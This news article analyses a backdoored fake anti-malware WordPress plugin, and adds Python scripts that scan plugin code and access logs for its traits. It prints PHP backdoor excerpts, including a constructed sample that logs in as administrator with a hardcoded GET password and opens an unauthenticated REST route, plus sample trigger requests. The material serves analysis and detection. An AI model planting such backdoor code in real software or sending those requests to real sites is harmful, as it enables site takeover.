
Fake Anti-Malware WordPress Plugin Found: Hidden Threat Disguises

In a discovery that raises serious alarms for WordPress users, Wordfence researcher Marco Wotschka uncovered a new malware variant disguised as a legitimate WordPress plugin. The sample was first found on January 22, 2025, by Wordfence analysts during a routine site cleanup.

Marco Wotschka, known for his detailed analyses of WordPress-based threats, found that the malicious file carried the deceptive name WP-antymalwary-bot.php. While it looks like a regular plugin file, the code inside grants attackers backdoor access, hides the plugin from the admin dashboard, and runs remote code through the WordPress REST API.


A REST API is an application programming interface that follows the representational state transfer (REST) architectural style. WordPress exposes its own REST API under /wp-json/, and any plugin can register additional routes there; each route is expected to declare a permission_callback that decides who may call it, which is precisely the check the article says this plugin's endpoint omits.

What Marco Wotschka Found in His Research

In his analysis, Marco Wotschka showed that the plugin raises no suspicion at first glance. It has the typical characteristics of a well-written plugin: clean formatting, a standard comment header, and no obviously malicious code at the top. Beneath the surface, however, it is a highly dangerous tool.

Among the malicious functions discovered:

  • Hidden Access Checks: A function called check_special_link answers a GET request that carries a specific parameter, letting the attacker confirm from outside that the backdoor is installed and active.
  • Emergency Admin Login: A function called emergency_login_all_admins logs the requester in with administrator privileges when the request carries a specific parameter and a hardcoded password.
  • Remote Code Execution (RCE): The plugin registers a REST API endpoint with no permission check, so unauthenticated callers can execute arbitrary admin-level commands.

Together these features give the attacker full control of the site, let them inject ads via malicious JavaScript, and even let the malware replicate itself into other directories.

Wordfence’s Response and Protection Timeline

The Wordfence team responded quickly. A malware signature was developed by January 24, two days after discovery. It was released to premium users immediately and made available to free users after the standard 30-day delay.

In addition to the signature, Wordfence released a firewall rule on April 23, 2025, giving Wordfence Premium, Care, and Response users real-time protection against attempts to exploit the infected plugin. Free users get the same rule starting May 23, 2025.

Marco Wotschka's research also fed Wordfence's Threat Intelligence Database, which now holds over 4.3 million malware samples. With premium signatures enabled, the Wordfence CLI tool and plugin scanner detect over 99% of them.

Detailed Code Analysis: What Makes This Malware Unique?

Marco points out the malware's similarities to the AI-generated malicious code seen in a supply chain attack Wordfence reported earlier. Features such as partially implemented functions, changes between versions, and code obfuscation mark it as a maintained, evolving tool rather than a one-off script.

Here's a glimpse into the kind of suspicious code included in the plugin (simplified excerpts; the parameter names and password shown stand in for the ones in the sample):

// Check plugin status: answers any request carrying ?check_plugin= so the
// attacker can confirm the backdoor is installed. No nonce, no capability check.
function check_special_link() {
    if (isset($_GET['check_plugin'])) {
        // (body elided in the original excerpt)
        echo json_encode(['status' => 'active']);
        exit;
    }
}
// 'init' fires on every request, authenticated or not.
add_action('init', 'check_special_link');

And for admin access:

// Emergency login: a hardcoded password in a GET parameter is the only
// "credential". Note the loose == comparison and the absence of any check
// on who is making the request.
function emergency_login_all_admins() {
    if (isset($_GET['emergency_login']) && $_GET['password'] == 'secret_password') {
        // (body elided in the original excerpt)
        // Logs in attacker as admin
    }
}
add_action('init', 'emergency_login_all_admins');

Neither function performs a nonce or capability check, and both are hooked to init, which WordPress runs on every request whether or not the visitor is logged in. Anyone who knows the parameter name and the hardcoded password can therefore trigger them without authenticating, from any URL on the site.
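As an added example (not Wordfence's code or its signatures), the following Python script turns the traits described above into heuristics and runs them over plugin source: an init handler that acts on $_GET without a nonce or capability check, a request parameter compared against a hardcoded string, a REST route registered with permission_callback set to __return_true, a call to wp_set_auth_cookie, and the file name from the report. The patterns, the REST-route form and both PHP samples are assumptions modelled on the article's description, not the real sample's code.

```python
"""Heuristic scan for the backdoor traits the article describes.

Added example, not Wordfence's code or its signatures. The indicator patterns
are assumptions modelled on the article's excerpts; both PHP samples below are
constructed for this example.
"""
from __future__ import annotations
import re

# Handlers hooked to 'init' run on every request, authenticated or not.
INIT_HOOK = re.compile(r"add_action\(\s*['\"]init['\"]\s*,\s*['\"](\w+)['\"]")
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST)\[")
AUTH_CHECK = re.compile(
    r"\b(?:wp_verify_nonce|check_admin_referer|current_user_can)\s*\(")
INDICATORS = {  # hypothetical patterns, one per trait the article describes
    "hardcoded_secret_compare": re.compile(
        r"\$_(?:GET|POST|REQUEST)\[[^\]]+\]\s*===?\s*['\"][^'\"]+['\"]"),
    "open_rest_route": re.compile(
        r"permission_callback['\"]?\s*=>\s*['\"]__return_true['\"]"),
    "forced_auth_cookie": re.compile(r"\bwp_set_auth_cookie\s*\("),
}
REPORTED_NAME_FRAGMENT = "antymalwary"  # from WP-antymalwary-bot.php in the report


def function_body(src: str, name: str) -> str | None:
    """Return the brace-delimited body of PHP function `name`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def scan_plugin(filename: str, src: str) -> list[str]:
    """Return the indicators found in one plugin file (empty list = clean)."""
    found = []
    if REPORTED_NAME_FRAGMENT in filename.lower():
        found.append("filename_matches_report")
    # An 'init' handler that acts on raw request input without a nonce or
    # capability check is reachable by anonymous visitors on any URL.
    for handler in INIT_HOOK.findall(src):
        body = function_body(src, handler)
        if body and REQUEST_INPUT.search(body) and not AUTH_CHECK.search(body):
            found.append(f"init_hook_reads_request:{handler}")
    for label, pattern in INDICATORS.items():
        if pattern.search(src):
            found.append(label)
    return found


BACKDOOR_SAMPLE = r"""<?php
/* Plugin Name: WP Anti-Malware Bot (constructed sample) */
function check_special_link() {
    if (isset($_GET['check_plugin'])) { echo json_encode(['status' => 'active']); exit; }
}
add_action('init', 'check_special_link');
function emergency_login_all_admins() {
    if (isset($_GET['emergency_login']) && $_GET['password'] == 'secret_password') {
        $admin = get_users(['role' => 'administrator', 'number' => 1])[0];
        wp_set_auth_cookie($admin->ID);
    }
}
add_action('init', 'emergency_login_all_admins');
add_action('rest_api_init', function () {
    register_rest_route('antimalware/v1', '/run', ['methods' => 'POST',
        'callback' => 'run_admin_command', 'permission_callback' => '__return_true']);
});
"""

BENIGN_SAMPLE = r"""<?php
/* Plugin Name: Cache Helper (constructed sample) */
function cache_helper_clear() {
    if (!isset($_GET['cache_helper_clear'])) { return; }
    if (!current_user_can('manage_options') || !wp_verify_nonce($_GET['_wpnonce'], 'clear')) {
        wp_die('Forbidden');
    }
    wp_cache_flush();
}
add_action('init', 'cache_helper_clear');
add_action('rest_api_init', function () {
    register_rest_route('cache-helper/v1', '/flush', ['methods' => 'POST',
        'callback' => 'wp_cache_flush',
        'permission_callback' => function () { return current_user_can('manage_options'); }]);
});
"""

if __name__ == "__main__":
    for name, src in [("WP-antymalwary-bot.php", BACKDOOR_SAMPLE), ("cache-helper.php", BENIGN_SAMPLE)]:
        print(name, scan_plugin(name, src) or "clean")
```

The benign sample reads $_GET from an init hook too, which is common in legitimate plugins; what separates it is the nonce and capability check inside the handler and a real permission_callback on the REST route. Regex heuristics like these are a triage aid for a cleanup, not a substitute for a maintained signature set.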

2024’s Fake Plugin Scams: Balada Injector & ClickFix Malware Exploits

Fake WordPress plugins are nothing new; they have been a recurring threat for years, deceiving site administrators and spreading malware. The trend continued in 2024, with cybercriminals using stolen credentials to get into WordPress sites and install malicious plugins.

One major campaign involved ClickFix fake browser updates, where attackers injected harmful JavaScript into compromised sites. The lure tricked visitors into downloading remote access trojans and info stealers such as Vidar Stealer and Lumma Stealer. Another widespread attack saw bogus WordPress plugins installed on over 6,000 sites, using deceptive names like "Advanced User Manager" and "Quick Cache Cleaner" to appear legitimate while secretly delivering malware.

Final Words by Marco Wotschka

Marco Wotschka emphasizes that this malware shows how dangerous it is to install unverified plugins, even ones that look perfectly legitimate. His research stresses monitoring server logs for unexpected GET parameters, such as the ones the backdoor reacts to, and keeping malware signatures up to date.

His final advice: “Always run malware scans with tools like Wordfence CLI, especially if your WordPress dashboard is inaccessible. Prevention is critical, but response is essential.”
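The log monitoring he recommends can be scripted. The following Python script is an added example, not Wordfence's code: it parses access-log lines in Combined Log Format and flags requests that would trigger the backdoor's init handlers. The parameter names (check_plugin, emergency_login, password) are taken from the article's excerpts and may differ in the real sample; the log lines are constructed.

```python
"""Flag access-log requests that would trigger the backdoor hooks shown above.

Added example, not Wordfence's code. Parameter names come from the article's
excerpts and may differ in the real sample; the log lines are constructed.
"""
from __future__ import annotations
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) ')

# Query parameters the backdoor's 'init' handlers react to (from the article).
TRIGGER_PARAMS = {"check_plugin", "emergency_login"}


def classify(line: str) -> dict | None:
    """Return a finding for one log line, or None if it looks ordinary."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # keep_blank_values so a bare ?check_plugin (no value) still counts.
    params = set(parse_qs(url.query, keep_blank_values=True))
    reasons = []
    hit = sorted(params & TRIGGER_PARAMS)
    if hit:
        reasons.append("backdoor_param:" + ",".join(hit))
    # The hooks run on 'init', so the trigger works on any path and the path
    # is not a useful filter; a credential in a GET query string is.
    if m["method"] == "GET" and "password" in params:
        reasons.append("password_in_get_query")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "target": m["target"], "status": int(m["status"]), "reasons": reasons}


def scan_log(lines) -> list[dict]:
    """Return the findings for every suspicious line, in log order."""
    return [f for f in map(classify, lines) if f]


def hits_by_ip(findings) -> dict[str, int]:
    """Count findings per source address to see who is probing the backdoor."""
    return dict(Counter(f["ip"] for f in findings))


SAMPLE_LOG = [  # constructed lines in Combined Log Format
    '203.0.113.7 - - [30/Apr/2025:10:01:12 +0000] "GET /?check_plugin=1 HTTP/1.1" 200 21 "-" "curl/8.5.0"',
    '203.0.113.7 - - [30/Apr/2025:10:01:15 +0000] "GET /index.php?emergency_login=1&password=secret_password HTTP/1.1" 302 0 "-" "curl/8.5.0"',
    '198.51.100.4 - - [30/Apr/2025:10:02:00 +0000] "GET /?p=123 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [30/Apr/2025:10:02:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'a line that is not in log format',
]

if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f["ts"], f["ip"], f["method"], f["target"], f["status"], ";".join(f["reasons"]))
    print(hits_by_ip(findings))
```

Run it against the real access log with something like `scan_log(open("/var/log/apache2/access.log"))`; a 302 on the emergency-login request is consistent with a successful login redirect, so matches with that status deserve the first look.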